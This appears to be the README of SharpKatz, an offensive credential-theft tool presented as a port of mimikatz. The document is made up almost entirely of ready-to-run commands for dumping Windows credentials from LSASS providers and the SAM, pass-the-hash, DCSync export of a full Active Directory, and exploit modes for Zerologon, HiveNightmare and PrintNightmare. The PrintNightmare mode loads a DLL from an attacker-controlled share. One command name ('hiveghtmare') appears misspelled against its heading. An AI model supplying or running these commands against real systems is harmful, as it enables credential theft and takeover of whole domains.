# SharpKatz

Porting of mimikatz `sekurlsa::logonpasswords`, `sekurlsa::ekeys` and `lsadump::dcsync` commands

## Usage
### Ekeys

```
SharpKatz.exe --Command ekeys
```

List Kerberos encryption keys

### Msv

```
SharpKatz.exe --Command msv
```

Retrieve user credentials from the Msv provider

### Kerberos

```
SharpKatz.exe --Command kerberos
```

Retrieve user credentials from the Kerberos provider

### Tspkg

```
SharpKatz.exe --Command tspkg
```

Retrieve user credentials from the Tspkg provider

### Credman

```
SharpKatz.exe --Command credman
```

Retrieve user credentials from the Credman provider

### WDigest

```
SharpKatz.exe --Command wdigest
```

Retrieve user credentials from the WDigest provider

### Logonpasswords

```
SharpKatz.exe --Command logonpasswords
```

Retrieve user credentials from all providers

### List shadowcopies

```
SharpKatz.exe --Command listshadows
```

Enumerate shadow copies with `NtOpenDirectoryObject` and `NtQueryDirectoryObject`
### Lsadumpsam

```
SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
```

Dump credentials from the provided SAM database (here read from a shadow copy, paths taken from the `listshadows` output)
### Pth

```
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
```

Perform pass-the-hash to create a process under the `userdomain\username` credential with the NTLM hash of the user's password

```
SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
```

Perform pass-the-hash to create a process under the `userdomain\username` credential with the user's RC4 key

```
SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
```

Replace the NTLM hash of an existing logon session

```
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
```

Perform pass-the-hash to create a process under the `userdomain\username` credential with the NTLM hash of the user's password and the AES256 key
### DCSync

```
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
```

Dump user credentials by username

```
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
```

Dump user credentials by GUID

```
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
```

Export the entire dataset from AD to a file created in the current user's temp folder

```
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
```

Dump user credentials by username using alternative credentials

```
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
```

Dump user credentials by GUID using alternative credentials

```
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
```

Export the entire dataset from AD to a file created in the current user's temp folder using alternative credentials
### Zerologon

No reference to `logoncli.dll`; the direct RPC call works even from a non-domain-joined workstation.

```
SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
```

Perform the Zerologon check

```
SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
```

Perform the Zerologon attack

```
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
```

Perform the Zerologon attack and dump user credentials by username

```
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
```

Perform the Zerologon attack and dump user credentials by GUID

```
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
```

Perform the Zerologon attack and export the entire dataset from AD to a file created in the current user's temp folder

Note: Do not use zerologon in a production environment, or at least plan for the recovery actions which are detailed here
### PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

```
SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll
```

Perform the PrintNightmare attack

```
SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
```

Perform the PrintNightmare attack with the provided credentials

### HiveNightmare (CVE-2021-36934)

```
SharpKatz.exe --Command hiveghtmare
```

Exploit the HiveNightmare vulnerability, selecting the first available shadow copy